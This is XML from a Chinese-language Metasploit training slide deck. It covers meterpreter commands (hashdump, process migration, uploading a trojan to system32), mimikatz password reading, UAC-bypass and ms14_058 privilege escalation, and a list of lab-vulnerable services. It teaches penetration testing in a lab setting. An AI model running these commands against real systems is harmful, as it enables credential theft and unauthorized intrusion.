              <a:t>download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>下载文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ls  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看文件 相当于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>windows dir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN"/>
              <a:t>execute -f cmd.exe -i –H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>getuid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>run post/windows/gather/hashdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>下载账户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Idletime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看运行时间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>run post/windows/manage/migrate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>更改进程名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>search -f autoexec.bat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>upload evil_trojan.exe c:\\windows\\system32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上传文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>systeminfo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获取系统信息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14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1753C-B648-4A15-93E3-E18C5706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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>载入插件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C71CB-10E5-43AD-89A2-EA7DC893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45C066-BCF2-4866-8F4A-703CC83E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57" y="1690132"/>
            <a:ext cx="6580952" cy="761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9AE985-400B-4239-987D-EA5701E1E449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892057" y="1320800"/>
            <a:ext cx="65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插件目录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8CA83C-C6F3-4FB4-BF5D-55EC47B92D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892057" y="2582333"/>
            <a:ext cx="658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有哪些插件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FFB92E-509E-4ECE-BA21-583039BE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85" y="2995664"/>
            <a:ext cx="9886715" cy="9678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8D9DD08-162D-4307-A7E6-B74B2951FFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959085" y="4114237"/>
            <a:ext cx="681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如何载入插件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AA525C-FE72-44A8-A25C-5601AA80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85" y="4507117"/>
            <a:ext cx="6813315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7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66D05-33A3-4C20-8CB2-28B48B79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command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84311D-F3B5-4006-97B1-95D2FF7E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91E198-D1C9-41A4-856E-21CC90A438A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1147477"/>
            <a:ext cx="11110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2"/>
              </a:rPr>
              <a:t>http://cohux.com:3000/web_vulu/metasploit/src/master/metasploit-command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>back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Show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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64A775-49EE-4157-A3BF-89133DFAF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735181"/>
            <a:ext cx="3142857" cy="6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F776D7-D371-4FE5-A79F-4B3A4DC90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670356"/>
            <a:ext cx="6123809" cy="20380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871CC44-EF3F-4F4A-87A4-1D6872AF8206}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539730" y="5460325"/>
            <a:ext cx="70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Connect -h</a:t>
            </a:r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EBADBA9-681B-4A92-AE9B-8BC814B41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9840" y="5262990"/>
            <a:ext cx="4085714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2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1A810-AC4B-43D7-8337-25C7893C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command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CCDD3-3CB5-4BD8-B597-0EF9F7AB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75CCC2-B719-4EE1-8E3D-D5946951ED48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1701209"/>
            <a:ext cx="943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edit   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exploit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exit    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>退出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5E80BA-5060-4BA5-91F0-6FF2D856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0" y="2456582"/>
            <a:ext cx="7190476" cy="23238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02379C5-B6B4-4F62-860C-DF7F6848ED59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707440" y="5018212"/>
            <a:ext cx="7265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grep  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>grep http search oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>search name:mysql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>search type:post</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>search cve:2011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>help </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>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62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490C4-ADAE-45A6-BF4B-44216B42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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技巧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4819D8-88C0-4D43-904F-7B3B861B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CA5AC1-FFA5-4FE4-9B73-91C3F96AE31A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1820333"/>
            <a:ext cx="86229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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>unset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设置参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>非全局</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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setg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>unsetg(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>全局设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>保存参数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backgroud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>放入后台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sessions –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示全部会话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sessions –i 1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进入会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN"/>
              <a:t>execute -f cmd.exe -i –H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行命令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run post/windows/gather/hashdump</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>upload evil_trojan.exe c:\\windows\\system32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上传文件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exploit –j –z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>放入后台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2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E2499-FF7C-4145-9FC9-CBEF97D8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巧用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>help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1C357-9005-4815-B986-FFAB13D8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DC0752-6C27-4190-97D0-1CFFD1AC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027" y="3184142"/>
            <a:ext cx="2657143" cy="235238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53DB5D-5048-48B9-923F-CECCFBC05F49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1642533"/>
            <a:ext cx="670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没啥好说的，不会就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>help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6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息探测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C39248-C14E-4E2F-B837-8E1BA7E8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54" y="1302949"/>
            <a:ext cx="2867025" cy="1828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E887B3-F5BC-4C28-BEC3-34C2F6FA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3893218"/>
            <a:ext cx="7114286" cy="22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25F240-7235-4370-9C9B-C51CA645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384" y="1302949"/>
            <a:ext cx="2857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0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1AA1E-7AF9-429D-A2E8-4FFEBEB8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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息探测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65568-8D44-4204-942A-9CE37AEA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58A71-881D-444C-AC58-D3582C37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" y="1879723"/>
            <a:ext cx="5933333" cy="19809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1B4FB9-93DA-4E73-9C6C-BC03374C6A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753533" y="1405467"/>
            <a:ext cx="593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扫描数据处理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92E8A7-CBA8-4C94-B2A5-4FB76390DCD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753533" y="4072467"/>
            <a:ext cx="600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cat subnet_1.gnmap | grep 80/open | awk '{print $2}'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B86D79-65F9-4197-8ECD-1259F92B4F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753533" y="4673600"/>
            <a:ext cx="593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也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>db_namp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3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2D3DF-14E3-4B0A-ADE8-E9DE1AE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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息探测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3547D-AA6A-445C-B230-1218A52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7B13EE-C99C-4E93-9462-A111EA78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7" y="1800605"/>
            <a:ext cx="7790476" cy="3038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DD8777-1765-4A55-9A22-783A8AD5D6AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1278467"/>
            <a:ext cx="77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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30056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8120" y="2218626"/>
            <a:ext cx="7584213" cy="656792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0"/>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="40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62548" y="2875418"/>
            <a:ext cx="7835824" cy="1994294"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>1.Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>基础讲解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>2.Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>信息探测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>3.Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>漏洞实战</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>4.Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>自动化攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>5.Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800"/>
              <a:t>后渗透技术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27D8D-6469-4605-A5BE-495B4D0A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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描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C8807-6876-4980-90A4-F7AF1B06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87599E-2B2F-4FCD-B701-52C1E0D6C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11" y="1226243"/>
            <a:ext cx="7485714" cy="5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6F61F-52A4-48B3-8C8D-F9C9D2F3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smb version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描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A5E8F-BDA6-4B13-8646-1C6E070B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4C89D6-17F9-4DB1-A082-BBE61DCC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4" y="1707065"/>
            <a:ext cx="6620933" cy="27801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EEDFCC-C4FE-4190-9E55-D7F53B605419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770467" y="1337733"/>
            <a:ext cx="720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metassploit smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描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F7011C-1023-47AE-9B8C-2D932E9B5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4619904"/>
            <a:ext cx="7104762" cy="2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03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8F1D6-D3D3-4259-888A-9E1B4C37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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其他扫描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883B6-31FC-47A8-9606-FEB5FE44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04BE0D-CAA9-4BAD-929A-0E2ACF85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86" y="1315039"/>
            <a:ext cx="3990476" cy="657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03DAA8-8AFF-4283-BE61-1729258B7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6" y="2090285"/>
            <a:ext cx="3666667" cy="6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64B84A-B8C5-4ED6-A207-4FCA74D40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86" y="2865530"/>
            <a:ext cx="5361905" cy="619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60BA48-8005-4C92-9E39-AA2F013FB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43" y="3602680"/>
            <a:ext cx="5761905" cy="13714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5CCF7E-FB68-460A-902A-F8BD672AB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43" y="5115075"/>
            <a:ext cx="4904762" cy="1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5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3CC50-7382-4682-BEA5-44D9DCD1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描补充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9CDEB3-0634-45AC-9382-3A4A9F9F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65534C-ECC9-4263-AE32-90CC7E08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58" y="1457614"/>
            <a:ext cx="2580952" cy="4628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8555F6-0F4B-4B83-AEC8-871DBBE3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81" y="1550747"/>
            <a:ext cx="3330419" cy="410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7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A4785-29FA-4487-A6C0-44F943F9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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞实战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15A62-76CF-420C-9396-55CB9D58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BB53E1-0DF4-4F76-9FC7-B6429C123224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1726058"/>
            <a:ext cx="1050018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Samba MS-RPC Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>vsftpd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UnrealIRCd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>后门漏洞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Linux NFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>共享目录配置漏洞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Java RMI SERVER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>管理台默认口令漏洞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Distcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>后门漏洞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Samba sysmlink </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>默认配置目录遍历漏洞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/>
              <a:t>PHP CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>参数注入执行漏洞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Druby </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>远程代码执行漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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ms08_067</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4088938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B933F-32C2-49DD-B019-94D83B87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meterpreter run post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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7B8E4-E588-4542-95AC-07535A7B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28A8F-651B-4CB2-A299-096D3C7E4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10771"/>
            <a:ext cx="5800000" cy="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7387A3-ABA8-495F-8335-859FB9575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442103"/>
            <a:ext cx="8904762" cy="16380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09B9FC-E526-4E44-8C93-CFBB91A29063}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1896533"/>
            <a:ext cx="5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枚举服务脚本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B1FAF8-E25C-4885-848A-5F91FF3E2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4508226"/>
            <a:ext cx="6809524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2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4B4-4B1B-41BF-ADDF-BB69690B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meterpreter run post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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3EAFC-D388-431B-BA5B-20B217FE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5B7914-FA95-4644-A8C8-1AB5FA7C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5" y="1526458"/>
            <a:ext cx="6655551" cy="28968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83774C-7461-4D9B-BF60-626E348E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5" y="4921033"/>
            <a:ext cx="6758292" cy="9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3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45EDD-AEE9-46DC-8524-BCA1B56B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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提权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8A8977-9A52-4F51-8789-F31C0118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2C1333-8E6B-4C5F-9532-7F246DA362F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="1854999"/>
            <a:ext cx="108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load mimikatz //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加载</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>wdigest //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>读取用户密码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8C24A8-CC07-4171-8B81-73D93773EF45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="552262" y="1118684"/>
            <a:ext cx="5376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 use exploit/windows/local/bypassua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>uac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提权</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> exploit/windows/local/bypassuac_injection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E8EE82-1469-4206-AF67-089B2377E490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="259131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>
                <a:solidFill>
                  <a:srgbClr val="464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>
                <a:solidFill>
                  <a:srgbClr val="464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metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="464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下已有的提权漏洞，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="464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ms13_053,ms14_058,ms16_016,ms16_032</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="464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等。下面以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="464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ms14_058</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="464F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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="140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33960A-0307-42C7-AB10-5295B461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3" y="32451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msf &gt; exploit/windows/local/ms14_058_track_popup_menu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msf exploit(ms14_058_track_popup_menu) &gt; set session 1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN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msf exploit(ms14_058_track_popup_menu) &gt; exploit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C0D32F0-EDF7-465A-91ED-CA9CBD35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3" y="4455859"/>
            <a:ext cx="7600000" cy="5238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ABB9BC5-1E40-4254-A675-1BA4B662E410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="3858338"/>
            <a:ext cx="761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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提权</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>路径</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1295266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B48D-8479-43A5-8AA4-2D62CB86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linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提权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6B197F-AA7F-49AB-AC0D-711432D1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4098C-7A8F-40D4-ADD7-E886503A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D6437A-0299-4F5D-BB23-56876BF173F0}"/>
